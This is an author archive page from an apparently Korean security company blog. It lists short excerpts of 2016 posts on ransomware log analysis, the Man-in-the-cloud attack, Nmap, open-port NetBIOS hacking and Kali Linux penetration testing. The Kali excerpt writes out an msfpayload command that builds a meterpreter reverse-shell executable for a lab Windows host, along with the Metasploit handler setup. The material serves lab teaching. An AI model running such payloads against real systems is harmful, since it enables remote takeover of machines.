You are here:-Ethan

About Ethan

This author has not yet filled in any details.
So far Ethan has created 6 blog entries.

(4) 로그 분석으로 잡는 랜섬웨어

<로그 분석으로 잡는 랜섬웨어> - 큐비트 시큐리티   “Your important files are encrypted.” 말로만 듣던 협박 메세지가 모니터에 띄워지는 순간, 머리가 멍해졌다가 '이게 무슨 소리인가?' 하고 정신을 차려 파일들을 살펴보니 확장자가 이상하다. 다시 협박 메세지 창으로 돌아와 줄어가는 시간을 보고 나서야 사태의 심각성을 인식한다.   랜섬웨어가 국내 첫 상륙 한지 약 일 년이 다 되어갑니다.

By | 3월 29th, 2016|Categories: Column|0 Comments

웹사이트 IP 주소 확인 프로그램

아는사람만 아는 꿀팁! 현재 보고 있는 웹사이트의 IP 확인하기   [Website IP] website IP는 현재 보고있는 웹사이트의 IP를 보여줍니다. - 현재 웹사이트의 IP를 아래의 그림처럼 우측 하단에서 항상 볼 수 있습니다. - 사용자가 마우스를 통하여 좌측과 우측으로 IP 위치를 이동 할 수 있습니다. - 우측 상단 아이콘은 기능을 활성, 비활성 할

By | 2월 14th, 2016|Categories: Tech|0 Comments

(2) 해킹의 진화 : 저렴하고 강력한 Man-in-the-cloud 발견!

2015년 8월 6일자 보안뉴스의 “해킹의 진화 : 저렴하고 강력한 Man-in-the-cloud 발견!”이라는 기사가 눈길을 끌었습니다. Man-in-the-cloud는 클라우드기반의 서버를 공략하여 동기화한 후 피해자 시스템의 레지스트리에서 가짜 토큰을 지워내고 사용자의 진짜 토큰을 다시 삽입해 넣기때문에 로그파일을 한줄 한줄 꼼꼼히 살펴보지 않는 한 알아채기 힘든 공략 방식입니다. 1. 공격자는 피해자에게 사회공학적 해킹 방법을 사용하여 드라이브 응용프로그램의

By | 2월 7th, 2016|Categories: Column|0 Comments

(1) Kali Linux를 이용한 모의 해킹

Kali Linux를 이용한 모의해킹   모의해킹 환경 VirtualBox 에 네트워크 브릿지로 연결됨 Kali Linux IP : 192.168.0.19 Windows 8.1 IP : 192.168.0.11 해킹을 위한 파일 생성 먼저 Kali linux에서 hacking.exe 파일을 생성합니다. # msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.19 LPORT=4444 x> hacking.exe Hacking.exe 파일을 윈도우에 복사합니다. Metasploit 실행 # msfconsole msf> use exploit/multi/handler msf>

By | 1월 17th, 2016|Categories: Column|0 Comments

Open Port Hacking

OPEN PORT 139,138,136,135 AND HACKING 설치(Windows) 먼저 아래의 툴을 다운로드 받는다. USER2SID & SID2USER NetBios Auditing Tool   사용 방법 Nmap Tool을 사용하여 Port Scanning을 합니다.( 'Nmap 설치가이드'를 참조하세요.) 대상 PC 192.168.0.XX에서 139번 포트가 열린 것이 확인됩니다. 다운로드 받은 파일을 C: 드라이브에 풀어놓습니다. cmd창을 열어 현재 연결 상태를 확인하겠습니다. C:UsersAdminstrator>net use 새 연결 정보가 저장됩니다. 목록에 항목이

By | 1월 10th, 2016|Categories: Tech|Open Port Hacking에 댓글 닫힘

Nmap 설치 및 사용법

네트워크 보안 스캐너 Nmap(Network Mapper)은 네트워크 검색과 보안 진단을 위한 무료 공개 소스 유틸리티입니다. Nmap의 설치방법과 사용법을 알아보세요.   설치(CentOS 6.5) $sudoyum groupinstall "Development Tools" $wget http://nmap.org/dist/nmap-6.47.tgz $tar zxvf nmap-6.47.tgz $cd nmap-6.47 $./configure $make $su root #make install 사용 방법 대상 호스트가 살아있는지 확인 (ping scan)[root@nmap ~]# nmap -sP 192.168.0.11/24Starting Nmap 6.47 (

By | 1월 3rd, 2016|Categories: Tech|Nmap 설치 및 사용법에 댓글 닫힘